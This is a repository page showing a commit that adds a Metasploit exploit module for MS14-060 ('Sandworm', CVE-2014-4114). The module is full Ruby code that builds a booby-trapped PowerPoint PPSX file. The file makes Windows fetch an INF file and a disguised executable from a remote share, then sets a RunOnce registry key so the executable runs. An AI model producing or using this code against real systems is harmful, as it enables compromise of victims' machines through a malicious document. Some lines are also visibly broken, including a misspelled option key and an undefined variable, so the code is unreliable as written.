infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add sandworm module

bug/bundler_fix
jvazquez-r7 2014-10-16 16:37:37 -05:00
parent 0941b98596
commit e40642799e
1 changed files with 213 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

213
modules/exploits/windows/fileformat/ms14_060_sandworm.rb Normal file
View File

@ -0,0 +1,213 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability Microsoft Windows from Vista SP2 to Windows 8,
including Windows Server 2008 and 2012. The vulnerability exists in the OLE package
magager, which allows to download and execute remote INF files silently. This module
triggers the vulnerability through a malicious PPSX file, as exploited in the wild on
October 2014.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Eduardo Prado', # Vulnerability discovery
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-4114'],
['OSVDB', '113140'],
['MSB', 'MS14-060'],
['BID', '70419'],
['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/'],
['URL', 'http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/']
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
['Windows 7 SP1 / Office 2010 SP1', {}],
],
'Privileged' => false,
'DisclosureDate' => "Oct 14 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']),
OptString.new('UNCPATH', [ true, 'The UNC path to use (Ex: \\\\192.168.1.1\\share)', '\\\\172.16.158.1\\public' ])
], self.class)
end
def exploit
@unc = validate_unc
if @unc.nil?
fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder")
end
print_status("Creating the EXE payload...")
payload_name = "#{rand_text_alpha(4)}.gif"
p = generate_payload_exe
print_status("Creating the INF file...")
inf_name = "#{rand_text_alpha(4)}.inf"
inf = inf_file(payload_name)
print_status("Creating '#{datastore['FILENAME']}' file ...")
exe_stream = ole_exe(payload_name)
inf_stream = ole_inf(inf_name)
zip = zip_ppsx(exe_stream, inf_stream)
file_create(zip)
payload_path = my_file_create(p, payload_name)
print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}")
inf_path = my_file_create(inf, inf_name)
print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}")
end
def validate_unc
if datastore['UNCPATH'] =~ /\\\\([^\\]+)\\([^\\]+)/
unc = datastore['UNPATH']
else
unc = nil
end
unc
end
def my_file_create(data, name)
ltype = "exploit.fileformat.#{self.shortname}"
path = store_local(ltype, nil, data, name)
path
end
def zip_ppsx(ole_exe, ole_inf)
zip_data = {}
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
Dir["#{data_dir}/**/**"].each do |file|
unless File.directory?(file)
zip_data[file.sub(data_dir,'')] = File.read(file)
end
end
#add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
#put our own OLE streams
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe
zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf
#and lets create the file
ppsx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
ppsx.add_file(k,v)
end
ppsx.pack
end
def ole_inf(file_name)
content = "EmbeddedStg2.txt\x00"
content << "#{@unc}\\#{file_name}\x00"
data = [content.length].pack('V')
data << content
ole = create_ole("\x01OLE10Native", data)
ole
end
def ole_exe(file_name)
content = "EmbeddedStg1.txt\x00"
content << "#{@unc}\\#{file_name}\x00"
data = [content.length].pack('V')
data << content
ole = create_ole("\x01OLE10Native", data)
ole
end
def create_ole(stream_name, data)
ole_tmp = Rex::Quickfile.new('ole')
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
stm = stg.create_stream(stream_name)
stm << data
stm.close
directory.each_entry do |entry|
if entry.instance_variable_get(:@_ab) == 'Root Entry'
# 02260200-0000-0000-c000-000000000046 # Video clip
clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
entry.instance_variable_set(:@_clsId, clsid)
end
end
# write to disk
stg.close
ole_contents = File.read(ole_tmp.path)
ole_tmp.close
ole_tmp.unlink
ole_contents
end
def inf_file(gif_name)
inf = <<-EOF
; 61883.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
[DestinationDirs]
DefaultDestDir = 1
[DefaultInstall]
RenFiles = RxRename
AddReg = RxStart
[RxRename]
#{gif_name}.exe, #{gif_name}
[RxStart]#
HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe
EOF
inf
end
end